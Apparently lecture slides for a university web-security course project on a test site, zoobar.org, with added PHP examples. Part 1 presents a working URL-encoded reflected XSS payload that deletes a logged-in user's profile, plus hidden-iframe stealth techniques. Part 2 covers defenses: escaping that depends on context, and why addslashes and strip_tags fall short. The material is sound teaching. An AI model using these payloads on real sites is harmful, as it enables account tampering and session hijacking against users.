Project 2: Web App Security
Spring 2006. CS 155. Project 2: Web App Security. Collin Jackson. Deadlines. Part 1. Attacks. Overview. Explore several attack types Requires both effectiveness and stealth Learn : How an attacker can evade sanitization Consequences of an exploit JavaScript Very basic CSS.

Presentation Transcript
Part 1: Attacks

Overview
  • Explore several attack types
  • Requires both effectiveness and stealth

  • Learn:
    • How an attacker can evade sanitization
    • Consequences of an exploit
    • JavaScript
    • Very basic CSS
Attacks
  • Attack A: Cookie Theft
    • Use URL encoding
    • Could hijack session
  • Attack B: Silent Transfer
    • Navigate browser
    • Use iframes, forms
  • Attack C: Login Snooping
    • Evade sanitization
    • Handle DOM events
  • Attack D: Profile Worm
    • Confuse site scripts
    • Replicate

Attacks (slide diagram): delivery paths via form, link and e-mail among zoobar.org, badguy.com and stanford.edu, including a redirect.

JavaScript
  • Browser scripting language with C-like syntax
  • Sandboxed, garbage collected
  • Closures

function makeClosure() { var x = 3; var y = function() { alert(x); }; return y; }

  • Encapsulation/objects

function X() { this.y = 3; } var z = new X(); alert(z.y);

  • Can interpret data as code (eval)
  • Browser-dependent
Invoking JavaScript
  • Tags: <script>alert('Hello world!')</script>
  • Links: javascript:alert('Hello world!')
    • Wrap code in "void" if it has a return value
  • Event handlers:

<form onsubmit="alert('Hello world!')">

<iframe onload="alert('Hello world!')">

  • CSS (IE only)

<style>body { background: url(javascript:alert('Hello world!')); }</style>

DOM Manipulation Examples
  • document.getElementById(id)
  • document.getElementsByTagName(tag)
  • document.write(htmltext)
  • document.createElement(tagname)
  • document.body.appendChild(node)
  • document.forms[index].fieldname.value = …
  • document.formname.fieldname.value = …
  • frame.contentDocument.getElementById(id)
Arrays and Loops

Example: Change href of all links on a page

var links = document.getElementsByTagName('a');
for (var i = 0; i < links.length; i++) {
  var link = links[i];
  link.href = "javascript:alert('Sorry!');";
}

Other Useful Functions
  • Navigation
    • document.location
    • document.formname.submit()
    • document.forms[0].submitfield.click()
  • Delayed Events
    • node.addEventListener(eventname, handler, useCapture)
    • node.removeEventListener(eventname, handler, useCapture)
    • window.setTimeout(handler, milliseconds)
Stealthy Styles

var node = document.getElementById("mynodeid");
node.style.display = 'none';       // may not load at all
node.style.visibility = 'hidden';  // still takes up space
node.style.position = 'absolute';  // not included in flow
document.write(                    // can also write CSS rules to page
  "<style>#mynodeid { visibility:hidden; }</style>");

Example: Profile Deleter
  • Malicious hyperlink deletes profile of user who clicks it
  • Only works when user logged in
    • User might have multiple tabs open
    • Might have chosen not to log out, or forgotten to log out
    • Might appear in another user's profile
  • Uses vulnerability in users.php from Attack A
  • Constructs profile deletion form and submits it
Find vulnerability

Site reflects query parameter in input field. Link can include anything we want here.

Copy form data

View source to find form fields. Create copycat form with our modifications.

URL encode

Close previous <input>, <form>. Button click triggers form submit.

Debugging

It didn't work. Open JavaScript console. Check error: undefined, no properties!

Two forms with same name.

Fixed version

Now with correct form.

Final Test

http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28%29%3C%2Fscript%3E

users.php replaced with index.php. Profile deleted.
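The reflection in users.php that the preceding slides walk through, as an added example that is not the project's code: the slides do not show the real users.php markup, so the form template below is an assumption, but the query string fed to it is the one from the Final Test slide. The vulnerable echo sits beside a version fixed with htmlspecialchars and ENT_QUOTES, and a third run shows why the backslash escaping that magic_quotes_gpc applies (see Part 2) does not help in an HTML context.

```php
<?php
// Added example, not the project's users.php (whose markup the slides do not
// show): a stand-in for the reflection described on the "Find vulnerability"
// slide, beside a fixed version. The form layout here is an assumption.

function render_user_field_vulnerable(string $user): string
{
    // Query parameter echoed straight into a quoted attribute value.
    return '<form method="GET" action="users.php">'
         . '<input name="user" value="' . $user . '">'
         . '</form>';
}

function render_user_field_fixed(string $user): string
{
    // ENT_QUOTES encodes both ' and ", so the value can never close the
    // attribute; < and > become entities, so no new tag can start.
    $safe = htmlspecialchars($user, ENT_QUOTES, 'UTF-8');
    return '<form method="GET" action="users.php">'
         . '<input name="user" value="' . $safe . '">'
         . '</form>';
}

// Did the rendered page gain a <script> tag or a second <form> from the input?
function injected_markup_present(string $html): bool
{
    return stripos($html, '<script') !== false
        || substr_count(strtolower($html), '<form') > 1;
}

// The query string from the "Final Test" slide, decoded as the server would.
$query = 'user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform'
       . '%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%'
       . '2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22'
       . 'Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28'
       . '%29%3C%2Fscript%3E';
parse_str($query, $params);
$user = $params['user'];

// magic_quotes_gpc (i.e. addslashes) only backslash-escapes quotes. A backslash
// means nothing to an HTML parser, so \" still closes the attribute.
$slashed = addslashes($user);

printf("vulnerable:            %s\n", injected_markup_present(render_user_field_vulnerable($user)) ? 'injected' : 'clean');
printf("vulnerable+addslashes: %s\n", injected_markup_present(render_user_field_vulnerable($slashed)) ? 'injected' : 'clean');
printf("fixed:                 %s\n", injected_markup_present(render_user_field_fixed($user)) ? 'injected' : 'clean');
```

The check function is deliberately crude (it only looks for the two symptoms this payload produces); it exists to make the difference between the three renderings visible, not to serve as a detector.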

Stealthier approaches
  • Post form into hidden iframe

<form name=F action=/index.php target=myframe>…
<iframe name=myframe style="visibility:hidden">…

  • Open page with form in hidden iframe

<iframe name=myframe style="visibility:hidden">…
<script>document.myframe.contentDocument.forms[0].profile_update.value = "";</script>

Part 2: Defenses

Goals
  • Learn:
    • How easy it is to make mistakes
    • That even simple code can be hard to secure
    • Techniques for appropriate input validation
    • PHP
    • Very basic SQL

Little programming knowledge can be a dangerous thing

PHP: Hypertext Preprocessor
  • Server scripting language with C-like syntax
  • Can intermingle static HTML and code

<input value=<?php echo $myvalue; ?>>

  • Encapsulation/objects

class X { var $y = 3; } $z = new X(); echo $z->y;

  • Can embed variables in double-quote strings

$user = "world"; echo "Hello $user!";

or $user = "world"; echo "Hello " . $user . "!";

  • Form data in global arrays $_GET, $_POST, …
SQL
  • Widely used database query language
  • Fetch a set of records

SELECT * FROM Person WHERE Username='grader'

  • Add data to the table

INSERT INTO Person (Username, Zoobars) VALUES ('grader', 10)

  • Modify data

UPDATE Person SET Zoobars=42 WHERE PersonID=5

  • Query syntax (mostly) independent of vendor
File structure
  • index.php
  • users.php
  • transfer.php
  • login.php
  • includes/
    • auth.php (cookie authentication)
    • common.php (includes everything else)
    • navigation.php (site template)
  • db/
    • zoobar/
      • Person.txt (must be writable by web server)
  • Includes /usr/class/cs155/projects/pp2/txt-db-api/…

Only edit these files

txt-db-api
  • Third-party text file database library
  • Data can be int, string, and autoincrement
  • Need to escape strings: \' \" \\
  • Actually magic_quotes_gpc does this for us

$recipient = $_POST['recipient']; // already escaped
$sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
$rs = $db->executeQuery($sql);
if ($rs->next())
  $id = $rs->getCurrentValueByName('PersonID');

Defenses to Part 1
  • Attack A: Cookie Theft
  • Attack B: Silent Transfer
  • Attack C: Login Snooping
  • Attack D: Profile Worm
Sanitization Techniques
  • addslashes(string)
    • Already done by magic_quotes_gpc
    • Inverse: stripslashes(string)
  • htmlspecialchars(string [, quote_style])
    • Converts & < > " to HTML entities
    • Use ENT_QUOTES to change ' to &#039;
  • strip_tags(string [, allowable_tags])
    • Max tag length 1024
    • Does not sanitize tag properties
  • preg_replace(pattern, replacement, subject)
  • More info: http://php.net
More XSS hunting
  • Look for untrusted input used as output
  • Note sanitization already applied to each variable
    • Form data has magic_quotes_gpc, db data does not
  • Determine browser context for output
    • Inside a quoted string within a tag – worry about ' "
    • Outside a tag – worry about < >
    • Input to eval – very dangerous
  • Sanitize the output if necessary
    • No penalty for erring on the side of caution
    • But sanitizing multiple times may lead to problems
  • No credit for solving non-goals: SQL injection, etc.
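The three browser contexts from the More XSS hunting slide and the two caveats from the Sanitization Techniques slide (sanitizing twice, and strip_tags leaving tag attributes alone), as an added example that is not part of the project code. The escaping routines and the sample strings are constructed here; the attribute routine also covers the unquoted attribute shown on the PHP slide.

```php
<?php
// Added example (not part of the project code): one output-escaping routine
// per browser context from the "More XSS hunting" slide, followed by the two
// pitfalls named on the "Sanitization Techniques" slide. Inputs are constructed.

// Context 1: text outside any tag. Strictly only < > & matter here, but
// encoding quotes as well costs nothing and is the cautious default.
function escape_text(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Context 2: attribute value. The routine emits the quotes itself, because the
// unquoted form seen on the PHP slide (value=<?php echo ... ?>) is broken by a
// plain space, which no entity encoding touches. ENT_QUOTES is needed so that
// ' cannot end a single-quoted attribute (before PHP 8.1, htmlspecialchars
// left ' alone by default).
function attribute(string $name, string $value): string
{
    return ' ' . $name . '="' . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '"';
}

// Context 3: a value that script code will read. Do not paste it into code or
// into eval(); emit a JSON literal with < > & ' " hex-escaped so it can neither
// end the <script> block nor leave the string literal.
function js_literal(string $s): string
{
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_QUOT | JSON_HEX_APOS | JSON_HEX_AMP);
}

$name = "O'Brien <b>\"admin\"</b> x=y";   // constructed sample input

echo '<p>', escape_text($name), "</p>\n";
echo '<input', attribute('name', 'user'), attribute('value', $name), ">\n";
echo '<script>var user = ', js_literal($name), ";</script>\n";

// Pitfall 1: sanitizing the same string twice (escaped once in an include,
// again in the template) turns &lt; into &amp;lt;, so the user sees a literal
// "&lt;" instead of "<".
$once  = htmlspecialchars('<b>', ENT_QUOTES, 'UTF-8');
$twice = htmlspecialchars($once, ENT_QUOTES, 'UTF-8');
echo "once:  $once\ntwice: $twice\n";
// double_encode=false leaves existing entities alone, which makes a repeated
// pass harmless; it does not undo the first one.
echo 'double_encode=false: ', htmlspecialchars($once, ENT_QUOTES, 'UTF-8', false), "\n";

// Pitfall 2: strip_tags keeps every allowed tag exactly as written, attributes
// included, and removes only the tags (not the text) of everything else.
$fragment = '<b onmouseover="untrusted()">hi</b><script>untrusted()</script>';
echo strip_tags($fragment, '<b>'), "\n";
// The <b> tag comes back with its onmouseover attribute intact and the
// <script> tags are gone but their text remains, so an allow-list of tag
// names is not a sanitizer on its own.
```

Pick the routine by where the value lands in the page, as the slide says, rather than by where it came from; the same string may need escape_text() in one place and attribute() in another, and neither replaces the other.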
Good luck!

Start early. Ask questions. Be creative.